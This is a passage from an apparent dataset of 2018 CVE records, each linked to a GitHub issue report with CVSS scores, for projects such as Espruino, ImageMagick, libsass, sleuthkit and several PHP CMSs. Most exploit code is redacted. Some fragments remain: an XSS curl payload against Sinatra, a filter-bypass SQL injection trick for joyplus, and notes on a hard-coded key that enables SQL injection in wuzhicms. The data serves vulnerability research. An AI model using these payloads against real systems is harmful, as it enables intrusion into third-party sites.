  20066. "Issue_Created_At": "2018-05-19T06:56:46Z",
  20067. "description": "multiple stack buffer overflows inside jslex parsing. We found with our fuzzer several buffer overflow errors that can be triggered with address sanitizer. Please see the following for details.",
  20068. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  20069. "severity": "HIGH",
  20070. "baseScore": 7.8,
  20071. "impactScore": 5.9,
  20072. "exploitabilityScore": 1.8
  20073. },
  20074. {
  20075. "CVE_ID": "CVE-2018-11596",
  20076. "Issue_Url_old": "https://github.com/espruino/Espruino/issues/1435",
  20077. "Issue_Url_new": "https://github.com/espruino/espruino/issues/1435",
  20078. "Repo_new": "espruino/espruino",
  20079. "Issue_Created_At": "2018-05-21T14:20:24Z",
  20080. "description": "stack buffer overflow inside APITAG We found some buffer overflows against commit APITAG in APITAG APITAG with address sanitizer. Till now, all these crashes involve the arrow function parsing. We haven't dug into the root cause yet, but we reduced the test input as: APITAG The error output is like: ERRORTAG",
  20081. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  20082. "severity": "MEDIUM",
  20083. "baseScore": 5.5,
  20084. "impactScore": 3.6,
  20085. "exploitabilityScore": 1.8
  20086. },
  20087. {
  20088. "CVE_ID": "CVE-2018-11597",
  20089. "Issue_Url_old": "https://github.com/espruino/Espruino/issues/1448",
  20090. "Issue_Url_new": "https://github.com/espruino/espruino/issues/1448",
  20091. "Repo_new": "espruino/espruino",
  20092. "Issue_Created_At": "2018-05-27T06:39:27Z",
  20093. "description": "Stack overflow error with a certain number of \"{\" in the input file. When there is a certain number of continuous \"{\" inside the input file, it may cause some stack overflows. For example, on my machine APITAG NUMBERTAG when compiled with address sanitizer, espruino emits a stack overflow when there are NUMBERTAG continuous \"{\" in the input files. This was actually observed by our fuzzer in Espruino's older versions several times, but we didn't reproduce it with vanilla address sanitizer. We wrote the following simple script to generate the input and finally reproduced it on APITAG CODETAG",
  20094. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  20095. "severity": "MEDIUM",
  20096. "baseScore": 5.5,
  20097. "impactScore": 3.6,
  20098. "exploitabilityScore": 1.8
  20099. },
  20100. {
  20101. "CVE_ID": "CVE-2018-11598",
  20102. "Issue_Url_old": "https://github.com/espruino/Espruino/issues/1437",
  20103. "Issue_Url_new": "https://github.com/espruino/espruino/issues/1437",
  20104. "Repo_new": "espruino/espruino",
  20105. "Issue_Created_At": "2018-05-22T09:46:38Z",
  20106. "description": "Different errors in APITAG We found with our fuzzer several different errors relevant to calculation of APITAG when calling APITAG in jsvar.c. We tested on ce NUMBERTAG but also reproduced them in APITAG and these errors can be triggered in a normal run without address sanitizer. FILETAG This leads to an invalid read. ERRORTAG FILETAG This leads to an infinite loop. FILETAG This calculates a weird pointer address. ERRORTAG",
  20107. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:H",
  20108. "severity": "HIGH",
  20109. "baseScore": 7.1,
  20110. "impactScore": 5.2,
  20111. "exploitabilityScore": 1.8
  20112. },
  20113. {
  20114. "CVE_ID": "CVE-2018-11625",
  20115. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/1156",
  20116. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/1156",
  20117. "Repo_new": "imagemagick/imagemagick",
  20118. "Issue_Created_At": "2018-05-30T07:36:02Z",
  20119. "description": "heap buffer overflow in APITAG Prerequisites x] I have written a descriptive issue title [x] I have verified that I am using the latest version of APITAG [x] I have searched [open URLTAG and closed URLTAG issues to ensure it has not already been reported Description Version: APITAG NUMBERTAG Q NUMBERTAG It will cause heap overflow when convert the POC to other APITAG Steps to Reproduce ERRORTAG POC FILETAG System Configuration APITAG version: APITAG NUMBERTAG Q NUMBERTAG Environment APITAG system, version and so on):ubuntu NUMBERTAG Additional information: Credit: Zongming Wang from Chengdu Security Response Center of Qihoo NUMBERTAG Technology Co. Ltd.",
  20120. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  20121. "severity": "HIGH",
  20122. "baseScore": 8.8,
  20123. "impactScore": 5.9,
  20124. "exploitabilityScore": 2.8
  20125. },
  20126. {
  20127. "CVE_ID": "CVE-2018-11627",
  20128. "Issue_Url_old": "https://github.com/sinatra/sinatra/issues/1428",
  20129. "Issue_Url_new": "https://github.com/sinatra/sinatra/issues/1428",
  20130. "Repo_new": "sinatra/sinatra",
  20131. "Issue_Created_At": "2018-05-22T08:59:02Z",
  20132. "description": "XSS from params parser exception (status code NUMBERTAG source at : URLTAG def params super rescue ERRORTAG ERRORTAG => e raise APITAG APITAG query parameters: {e.message}\" end demo code server.rb require 'sinatra' yes ... it empty just require sinatra gem call curl like curl i ' URLTAG data $'\" %x\\ > APITAG alert NUMBERTAG APITAG \"' return HTTP NUMBERTAG Bad Request Content Type: text/html;charset=utf NUMBERTAG SS Protection NUMBERTAG mode=block X Content Type Options: nosniff X Frame Options: SAMEORIGIN Content Length NUMBERTAG Invalid query parameters: invalid % encoding (\" %x > APITAG alert NUMBERTAG APITAG \") I know it NUMBERTAG but the error message can be HTML ...",
  20133. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  20134. "severity": "MEDIUM",
  20135. "baseScore": 6.1,
  20136. "impactScore": 2.7,
  20137. "exploitabilityScore": 2.8
  20138. },
  20139. {
  20140. "CVE_ID": "CVE-2018-11655",
  20141. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/930",
  20142. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/930",
  20143. "Repo_new": "imagemagick/imagemagick",
  20144. "Issue_Created_At": "2018-01-04T07:51:35Z",
  20145. "description": "memory leaks in APITAG INFO Version: APITAG NUMBERTAG Q NUMBERTAG FILETAG Copyright NUMBERTAG APITAG Studio LLC License: FILETAG Features: Cipher DPC HDRI Delegates (built in): bzlib djvu fftw fontconfig freetype gvc jbig jng jpeg lcms lqr lzma pangocairo png tiff webp wmf x xml zlib Trigger Command: PATHTAG APITAG memory leaks /dev/null ASAN OUTPUT ERRORTAG testcase: URLTAG",
  20146. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  20147. "severity": "MEDIUM",
  20148. "baseScore": 6.5,
  20149. "impactScore": 3.6,
  20150. "exploitabilityScore": 2.8
  20151. },
  20152. {
  20153. "CVE_ID": "CVE-2018-11656",
  20154. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/931",
  20155. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/931",
  20156. "Repo_new": "imagemagick/imagemagick",
  20157. "Issue_Created_At": "2018-01-04T07:55:45Z",
  20158. "description": "memory leaks in APITAG INFO Version: APITAG NUMBERTAG Q NUMBERTAG FILETAG Copyright NUMBERTAG APITAG Studio LLC License: FILETAG Features: Cipher DPC HDRI Delegates (built in): bzlib djvu fftw fontconfig freetype gvc jbig jng jpeg lcms lqr lzma pangocairo png tiff webp wmf x xml zlib Trigger Command: PATHTAG APITAG memory leaks /dev/null ASAN OUTPUT ERRORTAG testcase: URLTAG",
  20159. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  20160. "severity": "MEDIUM",
  20161. "baseScore": 6.5,
  20162. "impactScore": 3.6,
  20163. "exploitabilityScore": 2.8
  20164. },
  20165. {
  20166. "CVE_ID": "CVE-2018-11657",
  20167. "Issue_Url_old": "https://github.com/miniupnp/ngiflib/issues/7",
  20168. "Issue_Url_new": "https://github.com/miniupnp/ngiflib/issues/7",
  20169. "Repo_new": "miniupnp/ngiflib",
  20170. "Issue_Created_At": "2018-06-01T03:49:40Z",
  20171. "description": "DoS: an infinite loop ngiflib c NUMBERTAG in APITAG APITAG has an infinite loop if id doesn't match any case; it won't break. poc: FILETAG",
  20172. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  20173. "severity": "HIGH",
  20174. "baseScore": 7.5,
  20175. "impactScore": 3.6,
  20176. "exploitabilityScore": 3.9
  20177. },
  20178. {
  20179. "CVE_ID": "CVE-2018-11670",
  20180. "Issue_Url_old": "https://github.com/GreenCMS/GreenCMS/issues/108",
  20181. "Issue_Url_new": "https://github.com/greencms/greencms/issues/108",
  20182. "Repo_new": "greencms/greencms",
  20183. "Issue_Created_At": "2018-06-01T14:52:13Z",
  20184. "description": "APITAG APITAG \u4ece\u800c\u83b7\u53d6\u7f51\u7ad9webshell \u5229\u7528\u4ee3\u7801 exp\u4ee3\u7801\u5982\u4e0b\uff1a CODETAG",
  20185. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  20186. "severity": "HIGH",
  20187. "baseScore": 8.8,
  20188. "impactScore": 5.9,
  20189. "exploitabilityScore": 2.8
  20190. },
  20191. {
  20192. "CVE_ID": "CVE-2018-11671",
  20193. "Issue_Url_old": "https://github.com/GreenCMS/GreenCMS/issues/109",
  20194. "Issue_Url_new": "https://github.com/greencms/greencms/issues/109",
  20195. "Repo_new": "greencms/greencms",
  20196. "Issue_Created_At": "2018-06-01T14:53:42Z",
  20197. "description": "APITAG APITAG \u5229\u7528\u4ee3\u7801 exp\u4ee3\u7801\u5982\u4e0b\uff1a CODETAG",
  20198. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  20199. "severity": "HIGH",
  20200. "baseScore": 8.8,
  20201. "impactScore": 5.9,
  20202. "exploitabilityScore": 2.8
  20203. },
  20204. {
  20205. "CVE_ID": "CVE-2018-11683",
  20206. "Issue_Url_old": "https://github.com/liblouis/liblouis/issues/591",
  20207. "Issue_Url_new": "https://github.com/liblouis/liblouis/issues/591",
  20208. "Repo_new": "liblouis/liblouis",
  20209. "Issue_Created_At": "2018-06-01T23:07:42Z",
  20210. "description": "ASAn stack based buffer overflow in APITAG line NUMBERTAG in APITAG FILETAG Tested commit: APITAG Credit: Henri Salo Tools: american fuzzy lop URLTAG NUMBERTAG b, afl utils URLTAG Thanks to Kapsi internet k\u00e4ytt\u00e4j\u00e4t ry for providing valuable fuzzing resources. ERRORTAG",
  20211. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  20212. "severity": "HIGH",
  20213. "baseScore": 8.8,
  20214. "impactScore": 5.9,
  20215. "exploitabilityScore": 2.8
  20216. },
  20217. {
  20218. "CVE_ID": "CVE-2018-11684",
  20219. "Issue_Url_old": "https://github.com/liblouis/liblouis/issues/592",
  20220. "Issue_Url_new": "https://github.com/liblouis/liblouis/issues/592",
  20221. "Repo_new": "liblouis/liblouis",
  20222. "Issue_Created_At": "2018-06-01T23:59:33Z",
  20223. "description": "ASAn stack based buffer overflow in APITAG in line NUMBERTAG in APITAG FILETAG Tested commit: APITAG Credit: Henri Salo Tools: american fuzzy lop URLTAG NUMBERTAG b, afl utils URLTAG Thanks to Kapsi internet k\u00e4ytt\u00e4j\u00e4t ry for providing valuable fuzzing resources. ERRORTAG",
  20224. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  20225. "severity": "HIGH",
  20226. "baseScore": 8.8,
  20227. "impactScore": 5.9,
  20228. "exploitabilityScore": 2.8
  20229. },
  20230. {
  20231. "CVE_ID": "CVE-2018-11685",
  20232. "Issue_Url_old": "https://github.com/liblouis/liblouis/issues/593",
  20233. "Issue_Url_new": "https://github.com/liblouis/liblouis/issues/593",
  20234. "Repo_new": "liblouis/liblouis",
  20235. "Issue_Created_At": "2018-06-02T11:14:59Z",
  20236. "description": "ASAn stack based buffer overflow in APITAG in NUMBERTAG in APITAG FILETAG Tested commit: APITAG Credit: Henri Salo Tools: american fuzzy lop URLTAG NUMBERTAG b, afl utils URLTAG Thanks to Kapsi internet k\u00e4ytt\u00e4j\u00e4t ry for providing valuable fuzzing resources. ERRORTAG",
  20237. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  20238. "severity": "HIGH",
  20239. "baseScore": 8.8,
  20240. "impactScore": 5.9,
  20241. "exploitabilityScore": 2.8
  20242. },
  20243. {
  20244. "CVE_ID": "CVE-2018-11693",
  20245. "Issue_Url_old": "https://github.com/sass/libsass/issues/2661",
  20246. "Issue_Url_new": "https://github.com/sass/libsass/issues/2661",
  20247. "Repo_new": "sass/libsass",
  20248. "Issue_Created_At": "2018-06-03T01:41:59Z",
  20249. "description": "APITAG heap buffer overflow (OOB read) in APITAG ( PATHTAG ). Hey there, I have discovered a single byte out of bands read (OOB) in libsass at: APITAG URLTAG Found when fuzzing commit APITAG of libsass, using commit aa6d5c6 URLTAG of sassc as a harness. Compile flags to reproduce: APITAG System information: ERRORTAG This bug was found to be in libsass releases from FILETAG until the commit listed above. You can find a collection of APITAG files that trigger the bug FILETAG . The full ASAN report is shown below: ERRORTAG",
  20250. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:H",
  20251. "severity": "HIGH",
  20252. "baseScore": 8.1,
  20253. "impactScore": 5.2,
  20254. "exploitabilityScore": 2.8
  20255. },
  20256. {
  20257. "CVE_ID": "CVE-2018-11695",
  20258. "Issue_Url_old": "https://github.com/sass/libsass/issues/2664",
  20259. "Issue_Url_new": "https://github.com/sass/libsass/issues/2664",
  20260. "Repo_new": "sass/libsass",
  20261. "Issue_Created_At": "2018-06-03T02:31:46Z",
  20262. "description": "APITAG null pointer dereference (SEGV) in APITAG ( PATHTAG ). Hey there, I have discovered a null pointer dereference in libsass at: APITAG URLTAG Found when fuzzing commit APITAG of libsass, using commit aa6d5c6 URLTAG of sassc as a harness. Compile flags to reproduce: APITAG System information: ERRORTAG This bug was found to be in libsass releases from FILETAG through to FILETAG and then re introduced in the commit APITAG You can find a collection of APITAG files that trigger the bug FILETAG . The full ASAN report is shown below: ERRORTAG",
  20263. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  20264. "severity": "HIGH",
  20265. "baseScore": 8.8,
  20266. "impactScore": 5.9,
  20267. "exploitabilityScore": 2.8
  20268. },
  20269. {
  20270. "CVE_ID": "CVE-2018-11696",
  20271. "Issue_Url_old": "https://github.com/sass/libsass/issues/2665",
  20272. "Issue_Url_new": "https://github.com/sass/libsass/issues/2665",
  20273. "Repo_new": "sass/libsass",
  20274. "Issue_Created_At": "2018-06-03T02:39:40Z",
  20275. "description": "APITAG null pointer dereference (SEGV) in APITAG ( PATHTAG ). Hey there, I have discovered a null pointer dereference in libsass at: APITAG URLTAG Found when fuzzing commit APITAG of libsass, using commit aa6d5c6 URLTAG of sassc as a harness. Compile flags to reproduce: APITAG System information: ERRORTAG This bug was found to be in libsass releases from FILETAG until the commit fuzzed APITAG You can find a collection of APITAG files that trigger the bug FILETAG The full ASAN report is shown below: ERRORTAG",
  20276. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  20277. "severity": "HIGH",
  20278. "baseScore": 8.8,
  20279. "impactScore": 5.9,
  20280. "exploitabilityScore": 2.8
  20281. },
  20282. {
  20283. "CVE_ID": "CVE-2018-11697",
  20284. "Issue_Url_old": "https://github.com/sass/libsass/issues/2656",
  20285. "Issue_Url_new": "https://github.com/sass/libsass/issues/2656",
  20286. "Repo_new": "sass/libsass",
  20287. "Issue_Created_At": "2018-06-02T00:13:09Z",
  20288. "description": "APITAG heap buffer overflow (OOB read) in APITAG ( PATHTAG ). Hey there, I have discovered an out of bands read (OOB) in libsass at: PATHTAG URLTAG Found when fuzzing commit APITAG of libsass, using commit aa6d5c6 URLTAG of sassc as a harness. Compile flags to reproduce: APITAG System information: ERRORTAG This bug was found to be in libsass releases from NUMBERTAG to NUMBERTAG and the most recent HEAD. You can find a collection of APITAG files that trigger the bug FILETAG . The full ASAN report can be found FILETAG (symbols names too long to bother showing). ERRORTAG",
  20289. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:H",
  20290. "severity": "HIGH",
  20291. "baseScore": 8.1,
  20292. "impactScore": 5.2,
  20293. "exploitabilityScore": 2.8
  20294. },
  20295. {
  20296. "CVE_ID": "CVE-2018-11698",
  20297. "Issue_Url_old": "https://github.com/sass/libsass/issues/2662",
  20298. "Issue_Url_new": "https://github.com/sass/libsass/issues/2662",
  20299. "Repo_new": "sass/libsass",
  20300. "Issue_Created_At": "2018-06-03T01:54:30Z",
  20301. "description": "APITAG heap buffer overflow (OOB read) in Sass::handle_error ( PATHTAG ). Hey there, I have discovered a single byte out of bands read (OOB) in libsass at: APITAG URLTAG Found when fuzzing commit APITAG of libsass, using commit aa6d5c6 URLTAG of sassc as a harness. Compile flags to reproduce: APITAG System information: ERRORTAG This bug was found to be in libsass releases from FILETAG until the commit listed above. You can find a collection of APITAG files that trigger the bug FILETAG . The full ASAN report is shown below: ERRORTAG",
  20302. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:H",
  20303. "severity": "HIGH",
  20304. "baseScore": 8.1,
  20305. "impactScore": 5.2,
  20306. "exploitabilityScore": 2.8
  20307. },
  20308. {
  20309. "CVE_ID": "CVE-2018-11722",
  20310. "Issue_Url_old": "https://github.com/wuzhicms/wuzhicms/issues/141",
  20311. "Issue_Url_new": "https://github.com/wuzhicms/wuzhicms/issues/141",
  20312. "Repo_new": "wuzhicms/wuzhicms",
  20313. "Issue_Created_At": "2018-06-04T03:09:01Z",
  20314. "description": "wuzhicms FILETAG SQL Injection Vulnerability. wuzhicms FILETAG SQL Injection Vulnerability ========================== Advisory: wuzhicms FILETAG SQL Injection Vulnerability Author: snake.jin MENTIONTAG Affected Version: Latest NUMBERTAG ulnerability Description Recently, I found an SQL Injection Vulnerability in 'wuzhicms' because of the hard coded 'UC_KEY'. Vulnerable cgi: FILETAG ERRORTAG As the code above, if we know the UC_KEY, we can decode all the $get parameters, and the 'username' parameter causes a sql injection. Fortunately in the latest version the UC_KEY is hard coded as 'uc_key' => APITAG So we can use the code below to calculate the 'code' value: CODETAG ========================== POC && EXP URLTAG APITAG parameter 'code' value depends on the web server time. FILETAG Just enjoy it!",
  20315. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  20316. "severity": "CRITICAL",
  20317. "baseScore": 9.8,
  20318. "impactScore": 5.9,
  20319. "exploitabilityScore": 3.9
  20320. },
  20321. {
  20322. "CVE_ID": "CVE-2018-11734",
  20323. "Issue_Url_old": "https://github.com/e107inc/e107/issues/3170",
  20324. "Issue_Url_new": "https://github.com/e107inc/e107/issues/3170",
  20325. "Repo_new": "e107inc/e107",
  20326. "Issue_Created_At": "2018-06-04T04:45:19Z",
  20327. "description": "Output without filtering results in xss filtering. Website Background article insert payload FILETAG front end FILETAG Packet capture found no httponly FILETAG",
  20328. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  20329. "severity": "MEDIUM",
  20330. "baseScore": 6.1,
  20331. "impactScore": 2.7,
  20332. "exploitabilityScore": 2.8
  20333. },
  20334. {
  20335. "CVE_ID": "CVE-2018-11736",
  20336. "Issue_Url_old": "https://github.com/pluck-cms/pluck/issues/61",
  20337. "Issue_Url_new": "https://github.com/pluck-cms/pluck/issues/61",
  20338. "Repo_new": "pluck-cms/pluck",
  20339. "Issue_Created_At": "2018-05-31T04:15:42Z",
  20340. "description": "File upload vuln APITAG An issue was discovered in Pluck before NUMBERTAG Remote PHP code execution is possible. Do you have an email? I will send the details to it.",
  20341. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  20342. "severity": "CRITICAL",
  20343. "baseScore": 9.8,
  20344. "impactScore": 5.9,
  20345. "exploitabilityScore": 3.9
  20346. },
  20347. {
  20348. "CVE_ID": "CVE-2018-11737",
  20349. "Issue_Url_old": "https://github.com/sleuthkit/sleuthkit/issues/1266",
  20350. "Issue_Url_new": "https://github.com/sleuthkit/sleuthkit/issues/1266",
  20351. "Repo_new": "sleuthkit/sleuthkit",
  20352. "Issue_Created_At": "2018-06-03T13:32:43Z",
  20353. "description": "APITAG out of bounds unmapped memory access in ntfs_fix_idxrec ( PATHTAG ). Hey there, I have discovered an unmapped memory access in the sleuth kit at: APITAG URLTAG Found when fuzzing commit APITAG Compile flags to reproduce: APITAG System information: ERRORTAG This bug was found to be in sleuth kit releases from FILETAG up until and including the latest release FILETAG You can find a POC that triggers the bug FILETAG . The full ASAN report is shown below: ERRORTAG",
  20354. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:H",
  20355. "severity": "HIGH",
  20356. "baseScore": 8.1,
  20357. "impactScore": 5.2,
  20358. "exploitabilityScore": 2.8
  20359. },
  20360. {
  20361. "CVE_ID": "CVE-2018-11738",
  20362. "Issue_Url_old": "https://github.com/sleuthkit/sleuthkit/issues/1265",
  20363. "Issue_Url_new": "https://github.com/sleuthkit/sleuthkit/issues/1265",
  20364. "Repo_new": "sleuthkit/sleuthkit",
  20365. "Issue_Created_At": "2018-06-03T13:31:44Z",
  20366. "description": "APITAG out of bounds read (OOB) in ntfs_make_data_run ( PATHTAG ). Hey there, I have discovered an out of bounds read in the sleuth kit at: APITAG URLTAG Found when fuzzing commit APITAG Compile flags to reproduce: APITAG System information: ERRORTAG This bug was found to be in sleuth kit releases from FILETAG up until and including the latest release FILETAG You can find a collection of APITAG files that trigger the bug FILETAG The full ASAN report is shown below: ERRORTAG",
  20367. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:H",
  20368. "severity": "HIGH",
  20369. "baseScore": 8.1,
  20370. "impactScore": 5.2,
  20371. "exploitabilityScore": 2.8
  20372. },
  20373. {
  20374. "CVE_ID": "CVE-2018-11739",
  20375. "Issue_Url_old": "https://github.com/sleuthkit/sleuthkit/issues/1267",
  20376. "Issue_Url_new": "https://github.com/sleuthkit/sleuthkit/issues/1267",
  20377. "Repo_new": "sleuthkit/sleuthkit",
  20378. "Issue_Created_At": "2018-06-03T13:33:35Z",
  20379. "description": "APITAG out of bounds read (OOB) in raw_read ( PATHTAG ). Hey there, I have discovered an out of bounds read in the sleuth kit at: APITAG URLTAG Found when fuzzing commit APITAG Compile flags to reproduce: APITAG System information: ERRORTAG This bug was found to be in sleuth kit releases from FILETAG up until and including the latest release FILETAG You can find a collection of APITAG files that trigger the bug FILETAG . The full ASAN report is shown below: ERRORTAG",
  20380. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:H",
  20381. "severity": "HIGH",
  20382. "baseScore": 8.1,
  20383. "impactScore": 5.2,
  20384. "exploitabilityScore": 2.8
  20385. },
  20386. {
  20387. "CVE_ID": "CVE-2018-11740",
  20388. "Issue_Url_old": "https://github.com/sleuthkit/sleuthkit/issues/1264",
  20389. "Issue_Url_new": "https://github.com/sleuthkit/sleuthkit/issues/1264",
  20390. "Repo_new": "sleuthkit/sleuthkit",
  20391. "Issue_Created_At": "2018-06-03T03:45:46Z",
  20392. "description": "APITAG out of bounds read (OOB) in APITAG ( PATHTAG ). Hey there, I have discovered a one byte out of bounds read in the sleuth kit at: APITAG URLTAG Found when fuzzing commit APITAG Compile flags to reproduce: APITAG System information: ERRORTAG This bug was found to be in sleuth kit releases from FILETAG until the recent commit fuzzed APITAG You can find a collection of APITAG files that trigger the bug FILETAG . The full ASAN report is shown below: ERRORTAG",
  20393. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:H",
  20394. "severity": "HIGH",
  20395. "baseScore": 8.1,
  20396. "impactScore": 5.2,
  20397. "exploitabilityScore": 2.8
  20398. },
  20399. {
  20400. "CVE_ID": "CVE-2018-11743",
  20401. "Issue_Url_old": "https://github.com/mruby/mruby/issues/4027",
  20402. "Issue_Url_new": "https://github.com/mruby/mruby/issues/4027",
  20403. "Repo_new": "mruby/mruby",
  20404. "Issue_Created_At": "2018-05-28T21:58:48Z",
  20405. "description": "Use of uninitialized pointer in mrb_hash_keys. The following input demonstrates a crash: APITAG ASAN report: ERRORTAG This issue was reported by Daniel Teuchert, Cornelius Aschermann, Tommaso Frassetto, and Tigist Abera ( URLTAG",
  20406. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  20407. "severity": "CRITICAL",
  20408. "baseScore": 9.8,
  20409. "impactScore": 5.9,
  20410. "exploitabilityScore": 3.9
  20411. },
  20412. {
  20413. "CVE_ID": "CVE-2018-12022",
  20414. "Issue_Url_old": "https://github.com/FasterXML/jackson-databind/issues/2052",
  20415. "Issue_Url_new": "https://github.com/fasterxml/jackson-databind/issues/2052",
  20416. "Repo_new": "fasterxml/jackson-databind",
  20417. "Issue_Created_At": "2018-05-29T20:03:23Z",
  20418. "description": "CVE (id to be allocated): LDAP backed data source gadgets. Another approach to Default Typing vector is via data source definitions that allow passing LDAP url. There are NUMBERTAG reported gadgets covered under this particular issue.",
  20419. "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H",
  20420. "severity": "HIGH",
  20421. "baseScore": 7.5,
  20422. "impactScore": 5.9,
  20423. "exploitabilityScore": 1.6
  20424. },
  20425. {
  20426. "CVE_ID": "CVE-2018-12023",
  20427. "Issue_Url_old": "https://github.com/FasterXML/jackson-databind/issues/2058",
  20428. "Issue_Url_new": "https://github.com/fasterxml/jackson-databind/issues/2058",
  20429. "Repo_new": "fasterxml/jackson-databind",
  20430. "Issue_Created_At": "2018-06-08T05:30:38Z",
  20431. "description": "CVETAG : Block polymorphic deserialization of types from Oracle JDBC driver. There is a potential remote code execution (RCE) vulnerability, if user is NUMBERTAG handling untrusted content (where attacker can craft JSON NUMBERTAG using APITAG Typing\" feature (or equivalent; polymorphic value with base type of APITAG NUMBERTAG has oracle JDBC driver jar in classpath NUMBERTAG allows connections from service to untrusted hosts (where attacker can run an LDAP service) (note: steps NUMBERTAG and NUMBERTAG are common steps as explained in URLTAG To solve the issue NUMBERTAG types from JDBC driver are blacklisted to avoid their use as \"serialization gadgets\".",
  20432. "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H",
  20433. "severity": "HIGH",
  20434. "baseScore": 7.5,
  20435. "impactScore": 5.9,
  20436. "exploitabilityScore": 1.6
  20437. },
  20438. {
  20439. "CVE_ID": "CVE-2018-12034",
  20440. "Issue_Url_old": "https://github.com/VirusTotal/yara/issues/891",
  20441. "Issue_Url_new": "https://github.com/virustotal/yara/issues/891",
  20442. "Repo_new": "virustotal/yara",
  20443. "Issue_Created_At": "2018-06-07T22:55:17Z",
  20444. "description": "Out of bounds read, write in yr_execute_code. APITAG has several bugs in the implementation of the virtual machine. Two of which prove to be security issues that allow code execution by running a specially crafted binary rule: An out of bounds read in the opcode OP_PUSH_M URLTAG An out of bounds write in the opcode OP_POP_M URLTAG . These issues have been assigned the CVE ID's APITAG and APITAG , respectively. Obvious ways to mitigate this: checking every access to scratch memory require an explicit flag to load and run a compiled rule check every relocated address is within the loaded file make the loaded file read only While this might not be _as_ critical as say, a vulnerability that can be exploited by a rule in source form, YARA will run a binary rule without explicitly being told to do so. This means any service/third party who doesn't properly validate the user supplied rule is susceptible. I suggest you reject rules in binary form unless explicitly being allowed to do so. For the ones interested, I've written a (very long) write up URLTAG and made the APITAG exploit available here URLTAG",
  20445. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  20446. "severity": "HIGH",
  20447. "baseScore": 7.8,
  20448. "impactScore": 5.9,
  20449. "exploitabilityScore": 1.8
  20450. },
  20451. {
  20452. "CVE_ID": "CVE-2018-12039",
  20453. "Issue_Url_old": "https://github.com/joyplus/joyplus-cms/issues/425",
  20454. "Issue_Url_new": "https://github.com/joyplus/joyplus-cms/issues/425",
  20455. "Repo_new": "joyplus/joyplus-cms",
  20456. "Issue_Created_At": "2018-06-07T08:36:26Z",
  20457. "description": "joyplus cms has SQL code execution vulnerability. We can find website absolute path on this page: FILETAG in my test environment the absolute path is PATHTAG and execute the SQL statement in this page: FILETAG There is a note here that we can't use \"select\" directly. Here I used \"/ !select /\" to replace \"select\" then click the \"\u6267\u884c\"\uff08execute\uff09button\uff0cfinally we can find the phpinfo page on FILETAG FILETAG FILETAG",
  20458. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  20459. "severity": "CRITICAL",
  20460. "baseScore": 9.8,
  20461. "impactScore": 5.9,
  20462. "exploitabilityScore": 3.9
  20463. },
  20464. {
  20465. "CVE_ID": "CVE-2018-12047",
  20466. "Issue_Url_old": "https://github.com/XIMDEX/ximdex/issues/147",
  20467. "Issue_Url_new": "https://github.com/ximdex/xcms/issues/147",
  20468. "Repo_new": "ximdex/xcms",
  20469. "Issue_Created_At": "2018-06-06T09:13:40Z",
  20470. "description": "you have twelve parameters exists xss Vulnerability in search page.. Vulnerability url : URLTAG Vulnerability parameters: filter FILETAG NUMBERTAG use hackbar to simulate post submission, submit payload NUMBERTAG the response page will pop up the set contents according to the inserted js code NUMBERTAG using another question parameters found to produce the same effect. FILETAG FILETAG",
  20471. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
